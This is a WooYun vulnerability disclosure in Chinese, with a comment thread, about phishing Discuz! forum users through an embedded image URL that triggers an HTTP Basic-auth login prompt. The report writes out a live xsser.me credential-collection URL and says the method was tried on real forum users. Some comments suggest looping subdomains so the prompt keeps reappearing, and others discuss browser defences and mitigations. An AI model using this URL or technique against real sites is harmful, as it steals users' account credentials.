当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015248

漏洞标题:当Discuz!遇上xsser.me

相关厂商:Discuz!

漏洞作者: imlonghao

提交时间:2012-11-25 13:15

修复时间:2012-11-30 13:16

公开时间:2012-11-30 13:16

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-25: 细节已通知厂商并且等待厂商处理中
2012-11-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

利用的是xsser.me的基础认证钓鱼,并成功钓到用户数据

详细说明:

当在Discuz中回帖,插入一张很奇葩的图片时,可能就会导致用户被盗号。

http://xsser.me/authtest.php?id=Ayuk1y&info=Please+Login+In++@360.cn


例如上面那个地址,可以用图片来引用之,然后回帖,当用户看到这张图片的时候,就会触发提示登陆框。
这个地址是一个401头
HTTP/1.1 401 Unauthorized
当输入密码后,会重定向到收集数据的页面,接着,你们密码就被盗了。
我为什么认为这个是一个漏洞:
1、用户网站大多都是提醒用户不要再站外输入自己的账号密码,但是,现在将代码插入到网站内部,用户有认为这是在网站内部,所以就输入了自己的密码。
2、经过试验,成功钓到了用户的数据
3、不仅仅是Discuz,需要网站都支持引用一张网络图片,并没有对图片的HTTP头进行检验。基础认证钓鱼很容易蔓延开来。。
4、之前的钓鱼过程是:黑客设立钓鱼页——通过短信息等传播这个地址——用户访问——用户受骗
而现在是:黑客在帖子中插入钓鱼信息——用户访问——用户受骗
显然,就少了一个非常繁琐的步骤。
例如,在一个论坛中,我将那个图片插在签名中,然后几乎每个帖子都去回复,然后,用户基本上就是去到哪里都能看到我的框框。。。。-,-然后后果你猜?!
(部分浏览器不支持)

漏洞证明:

以360论坛和吾爱破解论坛做了个试验。。。

0.png


1.png


2.png


3.png


4.png


6.png


5.png


修复方案:

你们看着办吧,我也想不到什么好的对策。。。

版权声明:转载请注明来源 imlonghao@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-30 13:16

厂商回复:

最新状态:

暂无

漏洞评价:

评论

这些评论似乎很乌云~~~思密达
  1. 2012-11-30 17:37 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    这个欺骗应该属于钓鱼一类,只要任何网站只要能插入外部内容都可以成功。但和钓鱼不同的是,由于引入外部内容可伪装成合法数据且为用户数据的高度不可控,会导致web软件自身会拦不住(或者拦截成本过高),浏览器拦的话可以考虑(但目前也没见到类似拦截iframe的方法),再或者安全软件用智慧星方法把已知xss平台给拦(但这样的话对安全研究成为灾难)......所以个人更偏向需要向普通用户普及安全知识,或者用户自己直接用host把已知xss平台给屏蔽。综上:厂商忽略有道理,靠自己真修不了,也无从修起。

  2. 2012-12-04 14:45 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    to all,360安全卫士在微博上评论“Chrome对http auth方式钓鱼的安全问题一年前已经有更新了”。经初步测试,chrome确实在一年前进行了防御,对http auth貌似也纳入同源策略范围中,当要求http auth的页面元素和当前浏览页面不一致时,不进行弹窗。(A)测试方法:(1)a域名在iis 6中配置一个要求采取http basic验证登录的虚拟目录;(2)b域名的某页面插入a域名的目录访问url,然后访问之。(B)测试结果:(1)chrome早期版本的确会弹(采取Chromium 10.0.648.205[2011年4月版]验证);(2)chrome现版本(23.0.1271.95 m)不弹(参照测试:国内双核浏览器切换到极速chrome模式时不会弹,采取360极速浏览器5.1.0.520[基于Chromium 16.0.912.75 2012年1月版]、以及猎豹浏览器内测绿色版[2012年5月版]验证);(3)Firefox 15.0.1弹;(4)IE8弹(参照测试:未修补前,国内双核浏览器切换到IE兼容模式时都会弹,采取猎豹浏览器内测绿色版[2012年5月版]、以及360浏览器5.0版[2012年10月份版]验证)。(C)测试总结:(1)目前各国内厂商的所谓修补应该都是针对IE兼容模式下的临时参考性质补漏,因为默认采取IE兼容渲染居多;(2)有采取chrome内核的各国内浏览器在2012年1月份同步其Chromium内核后应该就没这个问题。(D)测试存在的缺陷:未测试ie9和ie10对双核浏览器的影响。抄送@imlonghao

  1. 2012-11-25 13:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    太假了... momo一直没钓到啊

  2. 2012-11-25 13:18 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @xsser 谁说一定要钓momo........

  3. 2012-11-25 13:22 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    这个也能钓到?

  4. 2012-11-25 13:53 | /fd ( 路人 | Rank:8 漏洞数:1 )

    前排

  5. 2012-11-25 14:51 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    收藏+1

  6. 2012-11-25 16:25 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    坐等公开,求洞主 zone写钓鱼方法

  7. 2012-11-25 16:27 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    mark

  8. 2012-11-25 19:02 | iproute ( 路人 | Rank:4 漏洞数:1 | 为路由器生,为交换机死,为Ping通奋斗一辈...)

    mark

  9. 2012-11-26 10:15 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    mark

  10. 2012-11-26 10:45 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    mark

  11. 2012-11-26 14:12 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @xsser 我不会告诉你,我看了这个之后我去测试然后也钓成功了。。

  12. 2012-11-30 13:56 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    我去,碉堡了、吊H网论坛撒、

  13. 2012-11-30 14:00 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    虽然不是dz独有的漏洞,但你考虑一下你的用户啊,这个公开出来还是对用户有影响的。。dz略叼。。。

  14. 2012-11-30 14:16 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 瞧你出息的 就知道钓momo

  15. 2012-11-30 14:19 | lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)

    真的可以啊

  16. 2012-11-30 14:21 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    如果是微博之类的社交网站 这样钓鱼危害到是不小

  17. 2012-11-30 14:26 | lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)

    @Finger 的确,看来好多人,又要丢账号了

  18. 2012-11-30 14:44 | DarkSun.Evil ( 路人 | Rank:14 漏洞数:2 | 请多关照...Thx...)

    这个 真可以有!

  19. 2012-11-30 15:07 | Wdot ( 实习白帽子 | Rank:77 漏洞数:12 | it came too later)

    2个网址那么显眼,还有人登陆

  20. 2012-11-30 15:12 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @xsser 动机不纯么!

  21. 2012-11-30 15:20 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @心伤的胖子 话说@xsser 有纯过么? 哈哈

  22. 2012-11-30 15:22 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    @心伤的胖子 钓哪个momo啊

  23. 2012-11-30 15:40 | mOon ( 路人 | Rank:0 漏洞数:1 | 上线非本人,请勿打扰!)

    momo我掉到了 难道我会告诉你们吗

  24. 2012-11-30 15:43 | Cr_Guest ( 路人 | Rank:5 漏洞数:2 | 失败是什么?没有什么,只是走近成功一步。)

    这也能掉到,坐等公开

  25. 2012-11-30 16:25 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @xsser 我感觉只要是支持网络地址的图片网站都有这样的问题,不过,真的好假。。。

  26. 2012-11-30 16:42 | Yaseng ( 实习白帽子 | Rank:62 漏洞数:7 | 干)

    赞一下 @imlonghao 的思路 假没事 最狠的就是一种弹出这个验证 直到他输入 不然看不了帖子 一般的人会受不了的

  27. 2012-11-30 16:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    黄色网站的福音

  28. 2012-11-30 16:49 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @xsser @Yaseng 貌似可以一直弹。。。。只要域名不同,效果一样就OK.......

  29. 2012-11-30 17:00 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 你猥琐了

  30. 2012-11-30 17:06 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Yaseng 求一直弹,要不然他们关闭了就不会弹了。

  31. 2012-11-30 17:17 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @疯子 a.a.cc b.a.cc c.a.cc d.a.cc 一直循环。。。

  32. 2012-11-30 17:17 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @lion(lp) lion lp=lion的老婆? 什么状况?

  33. 2012-11-30 17:18 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @lion(lp)

  34. 2012-11-30 17:37 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    这个欺骗应该属于钓鱼一类,只要任何网站只要能插入外部内容都可以成功。但和钓鱼不同的是,由于引入外部内容可伪装成合法数据且为用户数据的高度不可控,会导致web软件自身会拦不住(或者拦截成本过高),浏览器拦的话可以考虑(但目前也没见到类似拦截iframe的方法),再或者安全软件用智慧星方法把已知xss平台给拦(但这样的话对安全研究成为灾难)......所以个人更偏向需要向普通用户普及安全知识,或者用户自己直接用host把已知xss平台给屏蔽。综上:厂商忽略有道理,靠自己真修不了,也无从修起。

  35. 2012-11-30 17:40 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @horseluke 厂商貌似是超期自动忽略的...的确也很难修...人的问题比较重要

  36. 2012-11-30 17:59 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @imlonghao 补充一下,有种方法也可以缓解,那就是所有用户输入的东西都转换到服务器本地保存,比如远程图片抓取。不过用这种需斟酌,说不定等于开启爆服务器的途径...

  37. 2012-11-30 21:05 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    太强大了。

  38. 2012-11-30 22:19 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    我艹,这种也能骗过别人,哈,笑了

  39. 2012-12-01 00:13 | Yaseng ( 实习白帽子 | Rank:62 漏洞数:7 | 干)

    @horseluke 这么来怎样 打开一个页面之前 检测所有的外部 herf 是 401的就不显示

  40. 2012-12-01 10:11 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    为什么忽略了?

  41. 2012-12-01 12:22 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @popok :)

  42. 2012-12-01 15:38 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    @Wdot 赶紧了,亲,这个功能最需要实现了

  43. 2012-12-01 18:18 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    躺枪了,记得有会员反馈过,还被我删过一个,安全意识薄弱的同学会中招。

  44. 2012-12-01 18:21 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    艹,这个玩法太淫荡了,试了一下,N多网站、邮箱、SNS平台都可以玩!!! 给个精华吧 @xsser

  45. 2012-12-01 20:32 | tmp ( 路人 | Rank:15 漏洞数:1 | 此人很懒)

    @xsser momo 是啥???

  46. 2012-12-01 20:56 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @tmp 约炮神器

  47. 2012-12-01 21:35 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @Hmily H大,可能你删的就是我。。。我360号被封禁,52的号貌似还好。。。。

  48. 2012-12-02 11:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Hmily 浏览器改进下吧 是个亮点

  49. 2012-12-03 10:41 | lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)

    @Finger 俺是lion_00 跟LION那个大牛没啥交集的

  50. 2012-12-03 17:29 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    外部关联:http://blog.sina.com.cn/s/blog_47ecc36601018v3f.html (类似例子)

  51. 2012-12-04 09:03 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    @horseluke ls真好人

  52. 2012-12-04 14:45 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    to all,360安全卫士在微博上评论“Chrome对http auth方式钓鱼的安全问题一年前已经有更新了”。经初步测试,chrome确实在一年前进行了防御,对http auth貌似也纳入同源策略范围中,当要求http auth的页面元素和当前浏览页面不一致时,不进行弹窗。(A)测试方法:(1)a域名在iis 6中配置一个要求采取http basic验证登录的虚拟目录;(2)b域名的某页面插入a域名的目录访问url,然后访问之。(B)测试结果:(1)chrome早期版本的确会弹(采取Chromium 10.0.648.205[2011年4月版]验证);(2)chrome现版本(23.0.1271.95 m)不弹(参照测试:国内双核浏览器切换到极速chrome模式时不会弹,采取360极速浏览器5.1.0.520[基于Chromium 16.0.912.75 2012年1月版]、以及猎豹浏览器内测绿色版[2012年5月版]验证);(3)Firefox 15.0.1弹;(4)IE8弹(参照测试:未修补前,国内双核浏览器切换到IE兼容模式时都会弹,采取猎豹浏览器内测绿色版[2012年5月版]、以及360浏览器5.0版[2012年10月份版]验证)。(C)测试总结:(1)目前各国内厂商的所谓修补应该都是针对IE兼容模式下的临时参考性质补漏,因为默认采取IE兼容渲染居多;(2)有采取chrome内核的各国内浏览器在2012年1月份同步其Chromium内核后应该就没这个问题。(D)测试存在的缺陷:未测试ie9和ie10对双核浏览器的影响。抄送@imlonghao

  53. 2012-12-07 05:12 | 邪少 ( 实习白帽子 | Rank:58 漏洞数:7 )

    @popok 能骗到一些白痴的人 就可以。。

  54. 2012-12-07 17:52 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @horseluke 3Q

  55. 2013-01-05 16:53 | 墨水心_Len ( 实习白帽子 | Rank:70 漏洞数:15 | PKAV技术宅 | 每一个有文化的东西,我们都...)

    @imlonghao @horseluke 3Q

  56. 2014-04-25 09:32 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    牛逼啊 简直 是牛逼 尼玛 这要是留言掉后台岂不是无敌

  57. 2014-07-27 17:10 | Calify ( 路人 | Rank:7 漏洞数:5 | 未能联系到厂商或者厂商积极拒绝)

    “连接到xsser.me”= =估计只能欺骗小白吧